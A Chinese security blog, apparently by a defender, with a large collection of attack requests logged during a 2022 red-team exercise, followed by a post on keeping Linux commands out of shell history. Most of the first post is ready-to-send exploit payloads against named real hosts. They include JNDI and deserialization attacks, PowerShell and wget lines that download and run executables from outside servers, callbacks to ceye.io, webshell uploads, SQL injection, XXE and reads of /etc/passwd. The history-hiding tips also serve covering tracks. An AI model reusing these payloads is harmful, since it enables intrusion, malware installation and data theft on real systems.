2022年7月27日星期三

2022年的HVV期间抓到的一部分payload

以下所有内容都是在各种安全设备的后台记录到的数据包(不含敏感信息,实际也是攻击失败的),后面的部分留空表示会继续更新 (也可能不会再更新)

=============================================================

蓝凌前台代码执行漏洞,该漏洞是未公开漏洞(S3100028163)


POST /data/sys-common/treexml.tmpl HTTP/1.1 

User-Agent:Mozilla/4.0 (compatible, MSIE 7.0, Windows NT 5.1, 360SE) 

Host:vpn.dongfeng-nissan.com.cn 

Content-Type:application/x-www-form-urlencoded 

Content-Length:168 


s_bean=ruleFormulaValidate&script=try {String cmd = "ping www.baidu.com";Process child = Runtime.getRuntime().exec(cmd);} catch (IOException e) {System.err.println(e);}


=============================================================



FastJson 漏洞利用


POST / HTTP/1.1 

User-Agent:Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; TencentTraveler 4.0) 

Host:test.dongfeng-nissan.com.cn 

Content-Type:application/json; charset=utf-8 

Content-Length:115 


{

   "@type":"org.apache.shiro.jndi.JndiObjectFactory",

   "resourceName":"rmi://qNWA2Gls.dflqxk.ceye.io/Exploit"

}


===============================================================


fastjson(S2019010052)


POST / HTTP/1.1 

User-Agent:Mozilla/5.0 (Windows NT 6.1; rv,2.0.1) Gecko/20100101 Firefox/4.0.1 

Host:test.dongfeng-nissan.com.cn 

Content-Type:application/json; charset=utf-8 

Content-Length:258 

{

    "a":{

        "@type":"java.lang.Class",

        "val":"com.sun.rowset.JdbcRowSetImpl"

    },

    "b":{

        "@type":"com.sun.rowset.JdbcRowSetImpl",

        "dataSourceName":"rmi://5ltnibIi.dflqxk.ceye.io/Exploit",

        "autoCommit":true

    }

}


==============================================================

亿邮eyou 远程代码执行(S3000009837)


POST /webadm/?q=moni_detail.do&action=gragh HTTP/1.1 

User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:98.0) Gecko/20100101 Firefox/98.0 

Host:test.dongfeng-nissan.com.cn 

Content-Type:application/x-www-form-urlencoded 

Content-Length:25 


type='|cat /etc/passwd||'



==============================================================

齐治堡垒机SQL注入漏洞

GET /audit/gui_detail_view.php?token=1&id=\&uid=,chr(97)) or 1: print chr(121)+chr(101)+chr(115)

#&login=shterm HTTP/1.1 

User-Agent:Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv,2.0.1) Gecko/20100101 Firefox/4.0.1 

Host:test.dongfeng-nissan.com.cn 

Content-Length:0



==============================================================

泛微OA E-cology 文件上传 (/page/exportImport/uploadOperation.jsp)(S3100023488)

POST /page/exportImport/uploadOperation.jsp HTTP/1.1 

User-Agent:Mozilla/4.0 (compatible, MSIE 8.0, Windows NT 6.0, Trident/4.0) 

Host:test.dongfeng-nissan.com.cn 

Content-Type:multipart/form-data; boundary=b0d829daa06c13d6b3e16b0ad21d1eed 

Content-Length:288 

--b0d829daa06c13d6b3e16b0ad21d1eed

Content-Disposition: form-data; name="file"; filename="pwue.jsp"

Content-Type: application/octet-stream


<%out.print(40536 * 44175);new java.io.File(application.getRealPath(request.getServletPath())).delete();%>

--b0d829daa06c13d6b3e16b0ad21d1eed--



==============================================================

泛微OA9 前台任意文件上传(S3000009793)

POST /page/exportImport/uploadOperation.jsp HTTP/1.1 

User-Agent:Mozilla/4.0 (compatible, MSIE 8.0, Windows NT 6.0, Trident/4.0) 

Host:test.dongfeng-nissan.com.cn 

Content-Type:multipart/form-data; boundary=b0d829daa06c13d6b3e16b0ad21d1eed 

Content-Length:288 

--b0d829daa06c13d6b3e16b0ad21d1eed

Content-Disposition: form-data; name="file"; filename="pwue.jsp"

Content-Type: application/octet-stream


<%out.print(40536 * 44175);new java.io.File(application.getRealPath(request.getServletPath())).delete();%>

--b0d829daa06c13d6b3e16b0ad21d1eed--



==============================================================

通达OA v11.7 auth_mobi.php任意用户登录漏洞(S3100028588)

GET /mobile/auth_mobi.php?isAvatar=1&uid=11121212121212&P_VER=0 HTTP/1.1 

User-Agent:Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv,2.0.1) Gecko/20100101 Firefox/4.0.1 

Host:test.dongfeng-nissan.com.cn 

Content-Length:0 



==============================================================

通达OA文件包含(S2020010015)

POST /ispirit/interface/gateway.php HTTP/1.1 

User-Agent:Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; The World) 

Host:preview.dongfeng-nissan.com.cn 

Content-Type:application/x-www-form-urlencoded 

Content-Length:43 

json={"url":"/general/../../mysql5/my.ini"}




==============================================================

通达OA办公系统 report_bi.func.php 文件 dataset_id 参数 SQL注入漏洞(S3100023434)

POST /general/bi_design/appcenter/report_bi.func.php HTTP/1.1 

User-Agent:Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; TencentTraveler 4.0) 

Host:preview.dongfeng-nissan.com.cn 

Content-Type:application/x-www-form-urlencoded 

Content-Length:113 


_POST[dataset_id]=efgh%27-%40%60%27%60%29union+select+database%28%29%2C2%2Cuser%28%29%23%27&action=get_link_info&



==============================================================

ThinkCMF 任意内容包含漏洞(S2020091501)


GET /?a=fetch&content=<php>die(@md5(HelloThinkCMF))</php> HTTP/1.1 

Host:202.96.191.173:80 

User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 

Content-Type:application/json 

Accept-Encoding:gzip 

Connection:close 




==============================================================

用友 GRP-u8 SQL 注入, 可执行命令(S3000009903)


POST /Proxy HTTP/1.1 

User-Agent:Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Maxthon 2.0) 

Host:preview.dongfeng-nissan.com.cn 

Content-Type:application/x-www-form-urlencoded 

Content-Length:348 


cVer=9.8.0&dp=<?xml version="1.0" encoding="GB2312"?><R9PACKET version="1"><DATAFORMAT>XML</DATAFORMAT><R9FUNCTION> <NAME>AS_DataRequest</NAME><PARAMS><PARAM> <NAME>ProviderName</NAME><DATA format="text">DataSetProviderData</DATA></PARAM><PARAM> <NAME>Data</NAME><DATA format="text">select @@version</DATA></PARAM></PARAMS> </R9FUNCTION></R9PACKET>




==============================================================

锐捷 EWEB 远程代码执行(S2120090999)

POST /guest_auth/guestIsUp.php HTTP/1.1 

User-Agent:Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Maxthon 2.0) 

Host:preview.dongfeng-nissan.com.cn 

Content-Type:application/x-www-form-urlencoded 

Content-Length:63 


mac=1&ip=127.0.0.1|echo 'wkuqchdkhiuasborjbtn' > rqoojwfuwo.txt



==============================================================

Coremail爆出漏洞可以直接读取配置(S2019010019)

GET /mailsms/s?func=ADMIN:appState&dumpConfig=/ HTTP/1.1 

User-Agent:Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv,2.0.1) Gecko/20100101 Firefox/4.0.1 

Host:preview.dongfeng-nissan.com.cn 

Content-Length:0 




==============================================================

ShopXO 任意文件读取漏洞(CNVD-2021-15822)(S3100024378)


GET /public/index.php?s=/index/qrcode/download/url/L1dpbmRvd3Mvd2luLmluaQ= HTTP/1.1 

User-Agent:Mozilla/4.0 (compatible, MSIE 7.0, Windows NT 5.1, 360SE) 

Host:preview.dongfeng-nissan.com.cn 

Content-Length:0 




==============================================================

Zyxel防火墙命令注入漏洞(CVE-2022-30525)(S3100024936)


POST /ztp/cgi-bin/handler HTTP/1.1 

User-Agent:Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv,2.0.1) Gecko/20100101 Firefox/4.0.1 

Host:vpn.dongfeng-nissan.com.cn 

Content-Type:application/json 

Content-Length:142 


{"command":"setWanPortSt","proto":"dhcp","port":"4","vlan_tagged":"1","vlanid":"5","mtu":"; curl http://Z2i9EVbB.dflqxk.ceye.io;","data":"hi"}





==============================================================

Weblogic漏洞利用或扫描(D11236926c9)


GET /_async/AsyncResponseService HTTP/1.1 

Host:erp-ct.dfsouth.com 

User-Agent:Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:16.0) Gecko/20100101 Firefox/16.0 

Accept:*/* 

Connection:keep-alive 


==============================================================

Dynamicweb云电子商务系统未授权添加用户漏洞(CVE-2022-25369)


GET /Admin/Access/Setup/Default.aspx?Action=createadministrator&adminusername={{rand_base(6)}}&adminpassword={{rand_base(6)}}&adminemail=test@test.com&adminname=test HTTP/1.1 

User-Agent:Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Maxthon 2.0) 

Host:vpn.dongfeng-nissan.com.cn 

Content-Length:0 




==============================================================

ThinkPHP 5.x 远程代码执行(S2020091901)


GET /index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21 HTTP/1.1 

Host:202.96.191.161:80 

User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 

Accept-Encoding:gzip 

Connection:close 


==============================================================

Apache HTTP Server 远程命令执行(CVE-2021-41773)(S3000010931)


POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1 

Host:202.96.191.161:80 

User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 

Content-Length:33 

Content-Type:application/x-www-form-urlencoded 

Accept-Encoding:gzip 

Connection:close 


==============================================================

XML外部实体注入(D111751fdae)

POST /Autodiscover/Autodiscover.xml HTTP/1.1 

Host:58.248.167.75:80 

User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 

Content-Length:314 

Content-Type:application/xml 

Accept-Encoding:gzip 

Connection:close 


<!DOCTYPE xxe [

<!ELEMENT name ANY >

<!ENTITY xxe SYSTEM "file:///etc/passwd">]>

<Autodiscover xmlns="http://schemas.microsoft.com/exchange/autodiscover/outlook/responseschema/2006a">

<Request>

<EMailAddress>aaaaa</EMailAddress>

<AcceptableResponseSchema>&xxe;</AcceptableResponseSchema>

</Request>

</Autodiscover>



==============================================================

WebLogic反序列化远程代码执行漏洞(CVE-2019-2725)(S2020041008)


POST /_async/AsyncResponseService HTTP/1.1 

Connection:Keep-Alive 

Content-Type:text/xml; Charset=UTF-8 

Accept:*/* 

Accept-Language:zh-cn 

Referer:http://202.96.191.232:7001/_async/AsyncResponseService 

User-Agent:Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1) 

cmd:powershell (new-object System.Net.WebClient).DownloadFile('http://cb.fuckingmy.life/download.exe','%SystemRoot%/Temp/fdhuwgnzqjakuvg19698.exe');start %SystemRoot%/Temp/fdhuwgnzqjakuvg19698.exe 

Content-Length:206204 

Host:202.96.191.232:7001 


<?xml version="1.0" encoding="utf-8" ?>

    <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"

    xmlns:wsa="http://www.w3.org/2005/08/addressing"

    xmlns:asy="http://www.bea.com/async/AsyncResponseService">

    <soapenv:Header> <wsa:Action/><wsa:RelatesTo/><asy:onAsyncDelivery/>

    <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">

    <class><string>oracle.toplink.internal.sessions.UnitOfWorkChangeSet</string><void>

    <array class="byte" length="5010"><void index="0"><byte>-84</byte></void><void index="1"><byte>-19</byte></void><void index="2"><byte>0</byte></void><void index="3"><byte>5</byte></void><void index="4"><byte>115</byte></void><void index="5"><byte>114</byte></void><void index="6"><byte>0</byte></void><void index="7"><byte>23</byte></void><void index="8"><byte>106</byte></void><void index="9"><byte>97</byte></void><void index="10"><byte>118</byte></void><void index="11"><byte>97</byte></void><void index="12"><byte>46</byte></void><void index="13"><byte>117</byte></void><void index="14"><byte>116</byte></void><void index="15"><byte>105</byte></void><void index="16"><byte>108</byte></void><void index="17"><byte>46</byte></void><void index="18"><byte>76</byte></void><void index="19"><byte>105</byte></void><void index="20"><byte>110</byte></void><void index="21"><byte>107</byte></void><void index="22"><byte>101</byte></void><void index="23"><byte>100</byte></void><void index="24"><byte>72</byte></void><void index="25"><byte>97</byte></void><void index="26"><byte>115</byte></void><void index="27"><byte>104</byte></void><void index="28"><byte>83</byte></void><void index="29"><byte>101</byte></void><void index="30"><byte>116</byte></void><void index="31"><byte>-40</byte></void><void index="32"><byte>108</byte></void><void index="33"><byte>-41</byte></void><void index="34"><byte>90</byte></void><void index="35"><byte>-107</byte></void><void index="36"><byte>-35</byte></void><void index="37"><byte>42</byte></void><void index="38"><byte>30</byte></void>


--------------------------------------------------------------------------------------------------------


POST /_async/AsyncResponseService HTTP/1.1 

Connection:Keep-Alive 

Content-Type:text/xml; Charset=UTF-8 

Accept:*/* 

Accept-Language:zh-cn 

Referer:http://202.96.191.185:7001/_async/AsyncResponseService 

User-Agent:Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1) 

Upgrade-Insecure-Requests:1 

Content-Length:913 

Host:202.96.191.185:7001 


<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:wsa="http://www.w3.org/2005/08/addressing" xmlns:asy="http://www.bea.com/async/AsyncResponseService">   

<soapenv:Header> 

<wsa:Action>xx</wsa:Action>

<wsa:RelatesTo>xx</wsa:RelatesTo>

<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">

<void class="java.lang.ProcessBuilder">

<array class="java.lang.String" length="3">

<void index="0">

<string>cmd</string>

</void>

<void index="1">

<string>/c</string>

</void>

<void index="2">

<string>powershell (new-object System.Net.WebClient).DownloadFile('http://fid.hognoob.se/download.exe','%SystemRoot%/Temp/jnfkcgqimewoglq2347.exe');start %SystemRoot%/Temp/jnfkcgqimewoglq2347.exe</string>

</void>

</array>

<void method="start"/></void>

</work:WorkContext>

</soapenv:Header>

<soapenv:Body>

<asy:onAsyncDelivery/>

</soapenv:Body></soapenv:Envelope>


----------------------------------------------------------------------------------

POST /_async/AsyncResponseService HTTP/1.1 

Connection:Keep-Alive 

Content-Type:text/xml; Charset=UTF-8 

Accept:*/* 

Accept-Language:zh-cn 

Referer:http://202.96.191.185:7001/_async/AsyncResponseService 

User-Agent:Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1) 

Upgrade-Insecure-Requests:1 

Content-Length:915 

Host:202.96.191.185:7001 


<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:wsa="http://www.w3.org/2005/08/addressing" xmlns:asy="http://www.bea.com/async/AsyncResponseService">   

<soapenv:Header> 

<wsa:Action>xx</wsa:Action>

<wsa:RelatesTo>xx</wsa:RelatesTo>

<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">

<void class="java.lang.ProcessBuilder">

<array class="java.lang.String" length="3">

<void index="0">

<string>cmd</string>

</void>

<void index="1">

<string>/c</string>

</void>

<void index="2">

<string>powershell (new-object System.Net.WebClient).DownloadFile('http://fid.hognoob.se/download.exe','%SystemRoot%/Temp/hqugkeyrxkrllzg26646.exe');start %SystemRoot%/Temp/hqugkeyrxkrllzg26646.exe</string>

</void>

</array>

<void method="start"/></void>

</work:WorkContext>

</soapenv:Header>

<soapenv:Body>

<asy:onAsyncDelivery/>

</soapenv:Body></soapenv:Envelope>


==============================================================

WebLogic 权限绕过(CVE-2020-14883)(S2020102903)


POST /console/images/%252e%252e%252fconsole.portal HTTP/1.1 

Host:210.21.81.137:7001 

User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 

Connection:close 

Content-Length:157 

Content-Type:application/x-www-form-urlencoded 

Accept-Encoding:gzip 


_nfpb=true&_pageLabel=HomePage1&handle=com.bea.core.repackaged.springframework.context.support.ClassPathXmlApplicationContext("http://178.20.40.200/wbw.xml")



==============================================================

WebLogic反序列化远程代码执行漏洞(CVE-2017-10271)(S3000008711)


POST /_async/AsyncResponseService HTTP/1.1 

Connection:Keep-Alive 

Content-Type:text/xml; Charset=UTF-8 

Accept:*/* 

Accept-Language:zh-cn 

Referer:http://202.96.191.185:7001/_async/AsyncResponseService 

User-Agent:Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1) 

Upgrade-Insecure-Requests:1 

Content-Length:913 

Host:202.96.191.185:7001 


<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:wsa="http://www.w3.org/2005/08/addressing" xmlns:asy="http://www.bea.com/async/AsyncResponseService">   

<soapenv:Header> 

<wsa:Action>xx</wsa:Action>

<wsa:RelatesTo>xx</wsa:RelatesTo>

<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">

<void class="java.lang.ProcessBuilder">

<array class="java.lang.String" length="3">

<void index="0">

<string>cmd</string>

</void>

<void index="1">

<string>/c</string>

</void>

<void index="2">

<string>powershell (new-object System.Net.WebClient).DownloadFile('http://fid.hognoob.se/download.exe','%SystemRoot%/Temp/jnfkcgqimewoglq2347.exe');start %SystemRoot%/Temp/jnfkcgqimewoglq2347.exe</string>

</void>

</array>

<void method="start"/></void>

</work:WorkContext>

</soapenv:Header>

<soapenv:Body>

<asy:onAsyncDelivery/>

</soapenv:Body></soapenv:Envelope>



==============================================================

使用CVE-2021-36260漏洞对海康威视发起攻击尝试(S3000011160)


PUT /SDK/webLanguage HTTP/1.1 

Host:202.96.191.232:81 

User-Agent:Go-http-client/1.1 

Content-Length:102 

Accept:*/* 

Accept-Encoding:gzip, deflate 

Accept-Language:en-US,en;q=0.9,sv;q=0.8 

Content-Type:application/x-www-form-urlencoded; charset=UTF-8 

X-Requested-With:XMLHttpRequest 


<?xml version="1.0" encoding="UTF-8"?><language>$(cd /tmp/ && cd /var/tmp/ && cd /var/run/)</language>



==============================================================

ThinkPHP 远程代码执行(S2020060403)


GET /public/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo%20^<?php%20$action%20=%20$_GET['xcmd'];system($action);?^>>hydra.php HTTP/1.1 

Connection:Keep-Alive 

Accept:*/* 

Accept-Language:zh-cn 

Referer:http://210.21.81.157:8087/public/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo ^<?php $action = $_GET['xcmd'];system($action);?^>>hydra.php 

User-Agent:Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1) 

Host:210.21.81.157:8087 



==============================================================

Elasticsearch未授权访问(S3100024705)


GET /_cat/indices?format=json&h=index HTTP/1.1 

Host:202.96.191.232:9200 

Accept:*/* 

Accept-Encoding:gzip, deflate, br 

Connection:keep-alive 

User-Agent:python-httpx/0.21.1 




==============================================================

Shenzhen TVT Digital Technology Co. Ltd & OEM {DVR/NVR/IPC} API 远程命令执行(S3100024329)


POST /editBlackAndWhiteList HTTP/1.1 

Accept-Encoding:identity 

Content-Length:644 

Accept-Language:en-us 

Host:202.96.191.232:90 

Accept:*/* 

User-Agent:Mozila/5.0 

Connection:close 

Cache-Control:max-age=0 

Content-Type:text/xml 

Authorization:Basic YWRtaW46ezEyMjEzQkQxLTY5QzctNDg2Mi04NDNELTI2MDUwMEQxREE0MH0= 


<?xml version="1.0" encoding="utf-8"?><request version="1.0" systemType="NVMS-9000" clientType="WEB"><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type="filterTypeMode">refuse</filterType><filterList type="list"><itemType><addressType type="addressType"/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(cd${IFS}/tmp;wget${IFS}http://92.118.230.134/garm7${IFS}-O-${IFS}>GSec;chmod${IFS}777${IFS}GSec;./GSec${IFS}tvt)</ip></item></filterList></content></request>




==============================================================

XXL-JOB未授权远程代码执行漏洞(S3100023062)


POST /run HTTP/1.1 

Host:202.96.191.232:9999 

User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:83.0) Gecko/20100101 Firefox/83.0 

Content-Length:334 

Accept:*/* 

Accept-Language:en-US,en;q=0.5 

Connection:close 

Content-Type:application/json 

Accept-Encoding:gzip 

Connection:close 

{

  "jobId": 1,

  "executorHandler": "demoJobHandler",

  "executorParams": "demoJobHandler",

  "executorBlockStrategy": "COVER_EARLY",

  "executorTimeout": 0,

  "logId": 1,

  "logDateTime": 1586629003729,

  "glueType": "GLUE_SHELL",

  "glueSource": "calc",

  "glueUpdatetime": 1658940033024,

  "broadcastIndex": 0,

  "broadcastTotal": 0

}




==============================================================

中远麒麟 iAudit堡垒机 远程命令执行漏洞(get_luser_by_sshport.php)(S3100023318)

GET /get_luser_by_sshport.php?clientip=1;echo%20"<?php%20echo%20md5(ocuswpeelc);unlink(__FILE__);?>">/opt/freesvr/web/htdocs/freesvr/audit/ocuswpeelc.php;&clientport=1 HTTP/1.1 

Host:210.21.81.165 

User-Agent:Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1468.0 Safari/537.36 

Accept-Encoding:gzip 





==============================================================

奇安信NS-NGFW网康防火墙前台远程代码执行(S3000009856)


POST /directdata/direct/router HTTP/1.1 

Host:202.96.191.135 

User-Agent:Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1468.0 Safari/537.36 

Content-Length:200 

Content-Type:application/x-www-form-urlencoded 

Accept-Encoding:gzip 


{"action":"SSLVPN_Resource","method":"deleteImage","data":[{"data":["/var/www/html/d.txt;echo '<?php echo md5(tcynfdguxq);unlink(__FILE__);?>' >/var/www/html/tcynfdguxq.php"]}],"type":"rpc","tid":17}




==============================================================

Jenkins远程代码执行(CVE-2019-1003000)(S2020070703)

GET /securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.workflow.cps.CpsFlowDefinition/checkScriptCompile?value=@GrabConfig(disableChecksums=true)%0a@GrabResolver(name=%27test%27,%20root=%27http://aaa%27)%0a@Grab(group=%27package%27,%20module=%27sqqx%27,%20version=%271%27)%0aimport%20Payload; HTTP/1.1 

Host:202.96.191.135 

User-Agent:Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1468.0 Safari/537.36 

Accept-Encoding:gzip 




==============================================================

检测到针对用友U8 OA test.jsp的SQL注入漏洞攻击(S3000009930)


GET /yyoa/common/js/menu/test.jsp?doType=101&S1=(SELECT%20md5(204218669)) HTTP/1.1 

Host:202.96.191.135 

User-Agent:Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1468.0 Safari/537.36 

Accept-Encoding:gzip 




==============================================================

用友时空KSOA软件前台文件上传漏洞,该漏洞是未公开漏洞(S3100028170)


POST /servlet/com.sksoft.bill.ImageUpload?filepath=/&filename=9693326082.jsp HTTP/1.1 

Host:mam.dongfeng-nissan.com.cn 

User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 

Content-Length:171 

Accept:*/* 

Connection:close 

<% out.println(new String(new sun.misc.BASE64Decoder().decodeBuffer("OTY5MzMyNjA4Mg=="))); new java.io.File(application.getRealPath(request.getServletPath())).delete(); %>




==============================================================

用友NC 文件上传漏洞,该漏洞在检测发布时处于0day状态,未找到对应补丁。(S3100029010)


POST /aim/equipmap/accept.jsp HTTP/1.1 

Host:202.96.191.196 

User-Agent:python-requests/2.28.0 

Accept-Encoding:gzip, deflate 

Accept:*/* 

Connection:keep-alive 

Content-Type:multipart/form-data; boundary=---------------------------16314487820932200903769468567 

Content-Length:535 


-----------------------------16314487820932200903769468567

                Content-Disposition: form-data; name="upload"; filename="222222.txt"

                Content-Type: text/plain


                <%out.println("bea86d66a5278f9e6fa1112d2e2fcebf");%>

                -----------------------------16314487820932200903769468567

                Content-Disposition: form-data; name="fname"


                \webapps

c_web80900fd668c51631353aca37fc1f829.jsp

                -----------------------------16314487820932200903769468567--




==============================================================

泛微E-office do_excel.php任意文件写入漏洞

poc


POST /www/general/charge/charge_list/do_excel.php HTTP/1.1 

Host:xxx.com

User-Agent:Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0 

Content-Length:34 

Accept:text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 

Content-Type:application/x-www-form-urlencoded 

Referer:http://www.baidu.com/ 

Accept-Encoding:gzip


html=<?php system($_POST[pass]);?>



==============================================================

泛微E-cology文件上传漏洞

影响产品:8.0/9.0  10.47以下和其他版本

利用状态:在野利用

背景描述:泛微E-cology文件上传漏洞。

漏洞详情:先发包上传

POST /workrelate/plan/util/uploaderOperate.jsp HTTP/1.1

Host: target

Accept: */*

Accept-Language: en-US,en;q=0.5

Accept-Encoding: gzip, deflate

Content-Type: multipart/form-data; boundary=---------------------------34533880461293314163770424843

Accept-Encoding:gzip

Dnt: 1

Sec-Fetch-Dest: empty

Sec-Fetch-Mode: cors

Sec-Fetch-Site: same-site

Te: trailers

Connection: close

Content-Length: 437


-----------------------------34533880461293314163770424843

Content-Disposition: form-data; name="secId"

Content-Type: text/plain


1

-----------------------------34533880461293314163770424843

Content-Disposition: form-data; name="Filedata"; filename="log.txt"


success

-----------------------------34533880461293314163770424843

Content-Disposition: form-data; name="plandetailid"


1

-----------------------------34533880461293314163770424843--



将文件释放至跟网站根路径下 在数据包中将 fileid 替换

POST /OfficeServer HTTP/1.1

Host: target

Accept: */*

Accept-Language: en-US,en;q=0.5

Accept-Encoding: gzip, deflate

Content-Type: multipart/form-data; boundary=---------------------------34533880461293314163770424843

Accept-Encoding:gzip

Dnt: 1

Sec-Fetch-Dest: empty

Sec-Fetch-Mode: cors

Sec-Fetch-Site: same-site

Te: trailers

Connection: close

Content-Length: 437


-----------------------------34533880461293314163770424843

Content-Disposition: form-data; name="success"


{'OPTION':'INSERTIMAGE','isInsertImageNew':'1','imagefileid4pic':'1015543'}

-----------------------------34533880461293314163770424843--




==============================================================


(疑似0day)用友NC 6.5文件上传漏洞,该漏洞在检测发布时处于0day状态,未找到对应补丁。(S3100029005)


POST /uapim/upload/grouptemplet?groupid=2&fileType=jsp HTTP/1.1 

Host:202.96.191.196 

User-Agent:Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0 

Accept-Encoding:gzip, deflate 

Accept:text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 

Connection:close 

Content-Type:multipart/form-data; boundary=----WebKitFormBoundarymMgLJdk18SQHBnpj 

Content-Length:304 


------WebKitFormBoundarymMgLJdk18SQHBnpj

Content-Disposition: form-data; name="upload"; filename="whoami.jsp"

Content-Type: application/octet-stream


TEST123

------WebKitFormBoundarymMgLJdk18SQHBnpj

Content-Disposition: form-data; name="submit"


submit

------WebKitFormBoundarymMgLJdk18SQHBnpj--

======================================================

2022年7月23日星期六

隐藏你的 Linux 的命令行历史

 此文来源:在昨天被百度某大佬面试过程的提问的问题,我之前没有遇到过这种场景所以完全处于懵逼状态,于是后面上网搜索了一下,哇!涨知识了,原来还可以这样的。

正文

------------

如果你是 Linux 命令行的用户,有的时候你可能不希望某些命令记录在你的命令行历史中。原因可能很多,例如,你在公司担任某个职位,你有一些不希望被其它人滥用的特权。亦或者有些特别重要的命令,你不希望在你浏览历史列表时误执行。

然而,有方法可以控制哪些命令进入历史列表,哪些不进入吗?或者换句话说,我们在 Linux 终端中可以开启像浏览器一样的无痕模式吗?答案是肯定的,而且根据你想要的具体目标,有很多实现方法。在这篇文章中,我们将讨论一些行之有效的方法。

注意:文中出现的所有命令都在 Ubuntu 下测试过。

不同的可行方法

前面两种方法已经在之前一篇文章中描述了。如果你已经了解,这部分可以略过。然而,如果你不了解,建议仔细阅读。

1. 在命令前插入空格

是的,没看错。在命令前面插入空格,这条命令会被 shell 忽略,也就意味着它不会出现在历史记录中。但是这种方法有个前提,只有在你的环境变量 HISTCONTROL 设置为 "ignorespace" 或者 "ignoreboth" 才会起作用。在大多数情况下,这个是默认值。

所以,像下面的命令(LCTT 译注:这里[space]表示输入一个空格):

  1. [space]echo "this is a top secret"

如果你之前执行过如下设置环境变量的命令,那么上述命令不会出现在历史记录中。

  1. export HISTCONTROL = ignorespace

下面的截图是这种方式的一个例子。

第四个 "echo" 命令因为前面有空格,它没有被记录到历史中。

2. 禁用当前会话的所有历史记录

如果你想禁用某个会话所有历史,你可以在开始命令行工作前简单地清除环境变量 HISTSIZE 的值即可。执行下面的命令来清除其值:

  1. export HISTSIZE=0

HISTSIZE 表示对于 bash 会话其历史列表中可以保存命令的个数(行数)。默认情况,它设置了一个非零值,例如在我的电脑上,它的值为 1000。

所以上面所提到的命令将其值设置为 0,结果就是直到你关闭终端,没有东西会存储在历史记录中。记住同样你也不能通过按向上的箭头按键或运行 history 命令来看到之前执行的命令。

3. 工作结束后清除整个历史

这可以看作是前一部分所提方案的另外一种实现。唯一的区别是在你完成所有工作之后执行这个命令。下面是刚说到的命令:

  1. history -cw

刚才已经提到,这个和 HISTSIZE 方法有相同效果。

4. 只针对你的工作关闭历史记录

虽然前面描述的方法(2 和 3)可以实现目的,它们可以清除整个历史,在很多情况下,有些可能不是我们所期望的。有时候你可能想保存直到你开始命令行工作之间的历史记录。对于这样的需求,你开始在工作前执行下述命令:

  1. [space]set +o history

备注:[space] 表示空格。并且由于空格的缘故,该命令本身也不会被记录。

上面的命令会临时禁用历史功能,这意味着在这命令之后你执行的所有操作都不会记录到历史中,然而这个命令之前的所有东西都会原样记录在历史列表中。

要重新开启历史功能,执行下面的命令:

  1. [Space]set -o history

